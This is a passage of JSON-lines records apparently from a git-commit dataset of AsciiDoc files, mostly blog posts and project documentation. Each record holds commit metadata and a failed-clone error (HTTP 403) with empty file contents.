'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f87b329a40a19359acc5bc392562df1a38ece672","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f82cccf93b845127c3b3f5f5a89aae3a1bdfe5d6","subject":"Fix source code for data driven triggers Add missing conditions types Change plugin template name","message":"Fix source code for data driven triggers\nAdd missing conditions types\nChange plugin template name\n","repos":"jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/community\/docs\/developer-guide\/alerts.adoc","new_file":"src\/main\/jbake\/content\/community\/docs\/developer-guide\/alerts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9552c7cbc83b85b1affb4b6911005c43d6eff4c2","subject":"y2b create post Google+ Tutorial (Tips \\u0026 Tricks)","message":"y2b create post Google+ Tutorial (Tips \\u0026 Tricks)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-10-Google-Tutorial-Tips-u0026-Tricks.adoc","new_file":"_posts\/2011-08-10-Google-Tutorial-Tips-u0026-Tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48d8d30a5154ee31e526f1669ad29d57919c222","subject":"added changelog","message":"added changelog\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"Changelog.adoc","new_file":"Changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a7be7b9db6dcfbad216f747901d3a9e0d1c3ca74","subject":"Added conversatins docs","message":"Added conversatins docs\n","repos":"smoope\/java-sdk","old_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_file":"src\/main\/resources\/docs\/sdk-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smoope\/java-sdk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"baed0ec5ecad1fc9534e86ba498edb09289a3165","subject":"remove extra subsection heading","message":"remove extra subsection heading\n","repos":"cfn-stacks\/artifacts3-plugin","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cfn-stacks\/artifacts3-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4710a59c5e2dcb0a6661a4862c26a096813df4be","subject":"Update 2017-01-30-The-Start-of-a-New-Term.adoc","message":"Update 2017-01-30-The-Start-of-a-New-Term.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-01-30-The-Start-of-a-New-Term.adoc","new_file":"_posts\/2017-01-30-The-Start-of-a-New-Term.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5630acad792c5b20ca466b263305bd95d4cb553","subject":"Publish 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","message":"Publish 201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_file":"201-01-31-Auto-Geo-Coder-e-G-Mps-Tile-Merger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92b6e615052aa5553688dba4a651a7839c0221bb","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8747a5aa71f764ad8dbaba243e9a2af81f1a4463","subject":"y2b create post Hammer vs iPhone - How Can It Possibly Survive?","message":"y2b create post Hammer vs iPhone - How Can It Possibly Survive?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-12-Hammer-vs-iPhone--How-Can-It-Possibly-Survive.adoc","new_file":"_posts\/2016-07-12-Hammer-vs-iPhone--How-Can-It-Possibly-Survive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e44ad4b729e2e5b21037a0d7a0bc6681566221a","subject":"Update 2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","message":"Update 2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","new_file":"_posts\/2017-06-17-Installing-Fabric8-on-Azure-Container-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"048bd1b63b967353a60753d9775f6ace0f9fa570","subject":"Update","message":"Update\n","repos":"enng0227\/fis3,FrancesShih\/fis3,liukaijv\/fis3,BobJavascript\/fis3,liaolunhui\/fis3,wenyang12\/fis3,sweet3c\/fis3,philip8728\/fis3,mircle\/fis3,blue2sky\/fis3,alannesta\/fis3,Suninus\/fis3,sxlfzhy\/fis3,wenyang12\/fis3,7213\/fis3,7213\/fis3,shijunwei\/fis3,shijunwei\/fis3,alannesta\/fis3,fengshao0907\/fis3,taohaoge\/fis3,fengshao0907\/fis3,sxlfzhy\/fis3,evilemon\/fis3,aifeld\/fis3,loopnz\/fis3,jincdream\/fis3,magicstf\/fis3,sweet3c\/fis3,liukaijv\/fis3,enng0227\/fis3,alannesta\/fis3,samlin08\/fis3,liaolunhui\/fis3,aifeld\/fis3,charleschaochen\/fis3,Suninus\/fis3,krock01\/fis3,lpshan\/fis3,xtidt\/fis3,gaoxiaopang\/fis3,samlin08\/fis3,mircle\/fis3,xtidt\/fis3,magicstf\/fis3,nieying\/fis3,atian25\/fis3,evilemon\/fis3,loopnz\/fis3,charleschaochen\/fis3,wenyang12\/fis3,enng0227\/fis3,xtidt\/fis3,gaoxiaopang\/fis3,7213\/fis3,fengshao0907\/fis3,magicstf\/fis3,sweet3c\/fis3,krock01\/fis3,gaoxiaopang\/fis3,jy03078959\/fis3,blue2sky\/fis3,enng0227\/fis3,taohaoge\/fis3,charleschaochen\/fis3,Brother-Simon\/fis3,jy03078959\/fis3,blue2sky\/fis3,fex-team\/fis3,krock01\/fis3,sxlfzhy\/fis3,krock01\/fis3,liaolunhui\/fis3,taohaoge\/fis3,yonglehou\/fis3,fex-team\/fis3,sweet3c\/fis3,shijunwei\/fis3,FrancesShih\/fis3,7213\/fis3,liaolunhui\/fis3,blue2sky\/fis3,richard-chen-1985\/fis3,jy03078959\/fis3,ybg555\/fis3,7213\/fis3,FrancesShih\/fis3,lpshan\/fis3,philip8728\/fis3,fex-team\/fis3,samlin08\/fis3,loopnz\/fis3,gaoxiaopang\/fis3,Brother-Simon\/fis3,BobJavascript\/fis3,jy03078959\/fis3,ybg555\/fis3,atian25\/fis3,sxlfzhy\/fis3,taohaoge\/fis3,richard-chen-1985\/fis3,yonglehou\/fis3,atian25\/fis3,fex-team\/fis3,philip8728\/fis3,jincdream\/fis3,Brother-Simon\/fis3,krock01\/fis3,magicstf\/fis3,jincdream\/fis3,FrancesShih\/fis3,yonglehou\/fis3,Suninus\/fis3,nieying\/fis3,richard-chen-1985\/fis3,hechunwen\/fis3,charleschaochen\/fis3,liukaijv\/fis3,liaolunhui\/fis3,gaoxiaopang\/fis3,samlin08\/fis3,samlin08\/fis3,lpshan\/fis3,evilemon\/fis3,jy03078959\/fis3,evilemon\/fis3,nieying\/fis3,alannesta\/fis3,lpshan\/fis3,fengshao0907\/fis3,ybg555\/fis3,xtidt\/fis3,loopnz\/fis3,Brother-Simon\/fis3,sxlfzhy\/fis3,yonglehou\/fis3,atian25\/fis3,jincdream\/fis3,fengshao0907\/fis3,atian25\/fis3,philip8728\/fis3,blue2sky\/fis3,fex-team\/fis3,ybg555\/fis3,hechunwen\/fis3,wenyang12\/fis3,richard-chen-1985\/fis3,enng0227\/fis3,nieying\/fis3,aifeld\/fis3,Suninus\/fis3,philip8728\/fis3,mircle\/fis3,aifeld\/fis3,taohaoge\/fis3,liukaijv\/fis3,BobJavascript\/fis3,aifeld\/fis3,liukaijv\/fis3,shijunwei\/fis3,hechunwen\/fis3,nieying\/fis3,lpshan\/fis3,BobJavascript\/fis3,charleschaochen\/fis3,Brother-Simon\/fis3,mircle\/fis3,wenyang12\/fis3,alannesta\/fis3,hechunwen\/fis3,shijunwei\/fis3","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alannesta\/fis3.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"45b4b2425a856a6b85f17c6923601d9db19415d0","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c58c935042ff619879d5337994265de289635b9","subject":"Update 2017-02-21-Roasted-Cauliflower-Soup.adoc","message":"Update 2017-02-21-Roasted-Cauliflower-Soup.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-02-21-Roasted-Cauliflower-Soup.adoc","new_file":"_posts\/2017-02-21-Roasted-Cauliflower-Soup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9610a99022f047a4d928cf8a3ce22f082eb5456d","subject":"Update 2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","message":"Update 2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","new_file":"_posts\/2017-10-17-Three-short-Emacs-tips-for-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cb583d0ef5f015c9b8c1e61a651a0439ef9693a","subject":"Minor format changes to style guide.","message":"Minor format changes to style guide.\n","repos":"keithtyler\/artifacts,sebastianwelsh\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts,keithtyler\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,crankyoldgit\/artifacts,vonnopsled\/artifacts,destijl\/artifacts","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d431580c5c00b210a3a2bcbb7505ed34c7455c45","subject":"Add news\/2016-08-31-forge-3.3.1.final.asciidoc","message":"Add news\/2016-08-31-forge-3.3.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-08-31-forge-3.3.1.final.asciidoc","new_file":"news\/2016-08-31-forge-3.3.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"516ea6937a8ac09ff0ade440ef08c28bc5210124","subject":"Fixes #1944: Add a Readme file for Cf-clerk","message":"Fixes #1944: Add a Readme file for Cf-clerk\n","repos":"ncharles\/cf-clerk,VinceMacBuche\/cf-clerk,fanf\/cf-clerk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fanf\/cf-clerk.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"02af7685d80435a19da75958513a2878546091ff","subject":"Ilies updates","message":"Ilies updates\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/cockpit\/user-guide\/api-designer.adoc","new_file":"pages\/cockpit\/user-guide\/api-designer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cefb8cf78ebe55a8ded3d852cc7bc7b5bac06a82","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bcac6cca3352dc1d174382b7393916ecec2e5ba","subject":"- Added rough draft of JDG xPaaS Image documentation - Included environment variables, datasource, security, and cache information. - Incorporated dpalmer's feedback.","message":"- Added rough draft of JDG xPaaS Image documentation\n- Included environment variables, datasource, security, and cache information.\n- Incorporated dpalmer's feedback.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/xpaas_images\/data_grid.adoc","new_file":"using_images\/xpaas_images\/data_grid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4282a5e8e611adfde07370e0f123b3ebf3d91db5","subject":"Link to errbit's new github home.","message":"Link to errbit's new github home.","repos":"flyingmachine\/whoops,flyingmachine\/whoops,flyingmachine\/whoops","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flyingmachine\/whoops.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4668b078dffa3036946e91a378581fa4fe74541f","subject":"Update 20161110-1232-showoff-zone.adoc","message":"Update 20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone.adoc","new_file":"_posts\/20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc20f7abe542e780ed43c169411b23e6b4ddd7e9","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69cf3b5936d97fac265b2d9d9d6f1ba84856496c","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53af86d1270914b50b3cb2dead67c79ada85d028","subject":"Add doc","message":"Add doc\n\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"src\/main\/java\/net\/openhft\/chronicle\/queue\/internal\/AnalyticsMain.adoc","new_file":"src\/main\/java\/net\/openhft\/chronicle\/queue\/internal\/AnalyticsMain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8f2a937a3a5cbc86f70ac261f5dbd8f8e3bbfeda","subject":"Update 2016-01-05-Hello-There.adoc","message":"Update 2016-01-05-Hello-There.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-05-Hello-There.adoc","new_file":"_posts\/2016-01-05-Hello-There.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"940b481ad0f1fde32ca0ac34c4d738e8778f1c12","subject":"Update 2016-12-01-Salut-poto.adoc","message":"Update 2016-12-01-Salut-poto.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut-poto.adoc","new_file":"_posts\/2016-12-01-Salut-poto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d23da5897405622fa2e98046edb9103134dc4fc1","subject":"more on resources and hypermedia","message":"more on resources and hypermedia\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0da276cb420f5f329d04851dfb11a7b95b6e3fd","subject":"Update 2016-08-19-Android.adoc","message":"Update 2016-08-19-Android.adoc","repos":"iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io,iwangkai\/iwangkai.github.io","old_file":"_posts\/2016-08-19-Android.adoc","new_file":"_posts\/2016-08-19-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iwangkai\/iwangkai.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e9d935fafb9d15ebb754ebd4369762daaf3edf","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a33cb0cee564c4ffcdfa8820040b27fefffd5d18","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cb3f3dc34a0090e0e98d19b2336a37237213215","subject":"Update 2016-05-01-First-try.adoc","message":"Update 2016-05-01-First-try.adoc","repos":"christofmarti\/blog,christofmarti\/blog,christofmarti\/blog,christofmarti\/blog","old_file":"_posts\/2016-05-01-First-try.adoc","new_file":"_posts\/2016-05-01-First-try.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christofmarti\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afae10368cbf21cfa6937f2ffb3bfcf8adef6e96","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84738aa4f2fd93cb01d2137931fb1d33d80e5be","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67fc44cfbe52e690def973d65bf41007ebfbc96c","subject":"y2b create post Trying Some Bose Headphones","message":"y2b create post Trying Some Bose Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-23-Trying-Some-Bose-Headphones.adoc","new_file":"_posts\/2015-11-23-Trying-Some-Bose-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49005afe0afe687851273c1abda6f1e86f8c8e80","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9b5e2028d22a542d104de5c485d5e0693dab0c","subject":"Update 2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","message":"Update 2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","new_file":"_posts\/2017-12-11-Job-Hunting-Tips-and-Tricks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43625cf5d958ee6a2232190270c5cb3365f4980d","subject":"Reactive web resources documentation","message":"Reactive web resources documentation\n\nIncludes Vert.x extension installation, async and streaming over SSE.\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/going-reactive-with-vertx.adoc","new_file":"docs\/src\/main\/asciidoc\/going-reactive-with-vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5a816514c8beee7dc3cafd3332608d09d91ea3e","subject":"Create f5_sdn_config.adoc","message":"Create f5_sdn_config.adoc","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/f5_sdn_config.adoc","new_file":"admin_guide\/f5_sdn_config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cf051fc1d7741998028799bae8862876af8def2","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-contract.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a953ce539eb05a5f603f6ffa5fea7830484244","subject":"Update 